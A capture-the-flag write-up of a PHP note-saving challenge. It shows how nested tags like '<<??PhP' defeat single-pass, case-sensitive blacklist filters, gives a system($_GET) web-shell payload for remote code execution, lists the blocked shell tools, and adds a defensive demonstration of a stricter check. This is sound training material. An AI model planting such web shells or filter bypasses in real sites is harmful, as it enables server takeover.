Web Challenge — 3 ProgrammersHateProgramming2-sourcecode
Introduction
In this challenge we have to create a payload that bypasses the security features of this website. The main page has a form for adding a new note, and several filters are applied to the note before it is saved.
PHP code used:
<?php
// str_replace_first() and generateRandomString() are helpers defined elsewhere
// in the challenge source; they are not shown here. All replacements below are
// case-sensitive and are applied once, in this order, to the raw POST body.
if(isset($_POST["notewrite"]))
{
    $newnote = $_POST["notewrite"];
    $notetoadd = str_replace_first("<?php", "", $newnote);
    $notetoadd = str_replace_first("?>", "", $notetoadd);
    $notetoadd = str_replace_first("<?", "", $notetoadd);
    $notetoadd = str_replace_first("flag", "", $notetoadd);
    $notetoadd = str_replace("fopen", "", $notetoadd);
    $notetoadd = str_replace("fread", "", $notetoadd);
    $notetoadd = str_replace("file_get_contents", "", $notetoadd);
    $notetoadd = str_replace("fgets", "", $notetoadd);
    $notetoadd = str_replace("cat", "", $notetoadd);
    $notetoadd = str_replace("strings", "", $notetoadd);
    $notetoadd = str_replace("less", "", $notetoadd);
    $notetoadd = str_replace("more", "", $notetoadd);
    $notetoadd = str_replace("head", "", $notetoadd);
    $notetoadd = str_replace("tail", "", $notetoadd);
    $notetoadd = str_replace("dd", "", $notetoadd);
    $notetoadd = str_replace("cut", "", $notetoadd);
    $notetoadd = str_replace("grep", "", $notetoadd);
    $notetoadd = str_replace("tac", "", $notetoadd);
    $notetoadd = str_replace("awk", "", $notetoadd);
    $notetoadd = str_replace("sed", "", $notetoadd);
    $notetoadd = str_replace("read", "", $notetoadd);
    $notetoadd = str_replace("ls", "", $notetoadd);
    $notetoadd = str_replace("ZeroDayTea is not hot", "", $notetoadd);
    // The filtered note is written to a file with a .php extension, so whatever
    // survives the filters is executed as PHP when that file is requested.
    $filename = generateRandomString();
    file_put_contents("$filename.php", $notetoadd);
    header("location:index.php");
}
?>
So to bypass this code I have to submit PHP code, since the note is already saved with a .php extension.
The first filters to bypass are <? and ?>. The PHP code simply removes each of them once, so I created the payload <<?? for <?: when the code removes the <? part from my payload, what remains automatically becomes <?. The same trick turns ??>> into ?>.
Now I have to bypass the php string, which I can do simply by writing it as pHp or PhP.
So the final payload is:
<<??PhP phpinfo(); ??>>
Send it and BOOM!! PHP code execution.
Now it’s time for RCE
I created this payload by analyzing the above php code.
<<??PhP system($_GET["wraith"]); ??>>
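As an added example (not the challenge's own code), the script below reproduces the tag filters from the listing above to show how a single-pass, case-sensitive blacklist lets a nested payload reassemble a PHP open tag, and contrasts it with a check that rejects the note instead of stripping it. The definition of str_replace_first is an assumption based on its name, since the page does not show it.

```php
<?php
// Added example, not the challenge's own code. str_replace_first() is not
// shown on the page; this definition is an assumption based on its name
// (remove only the first occurrence, case-sensitively).
function str_replace_first(string $search, string $replace, string $subject): string
{
    $pos = strpos($subject, $search);
    if ($pos === false) {
        return $subject;
    }
    return substr_replace($subject, $replace, $pos, strlen($search));
}

// The challenge's tag filters, in the same order and with the same
// remove-once, case-sensitive semantics as the original listing.
function weakSanitize(string $note): string
{
    $note = str_replace_first("<?php", "", $note);
    $note = str_replace_first("?>", "", $note);
    $note = str_replace_first("<?", "", $note);
    foreach (["fopen", "fread", "file_get_contents", "cat", "ls"] as $word) {
        $note = str_replace($word, "", $note);
    }
    return $note;
}

// Reject instead of strip: a note is refused if it still contains an open
// tag after case folding. PHP's open tag is case-insensitive, which is why
// stripos (not strpos) is the right primitive, and why nesting cannot help:
// the raw input "<<??" already contains "<?".
function looksLikePhp(string $note): bool
{
    return stripos($note, "<?") !== false;
}

$payload = '<<??PhP phpinfo(); ??>>';          // constructed sample input
var_dump(weakSanitize($payload));               // string(19) "<?PhP phpinfo(); ?>"
var_dump(looksLikePhp($payload));               // bool(true): rejected up front
var_dump(looksLikePhp("just a note"));          // bool(false)
```

The rejection check is defence in depth only; the root cause is that user content is written to a file with a .php extension, so storing notes as .txt and serving them as text/plain removes the execution path entirely.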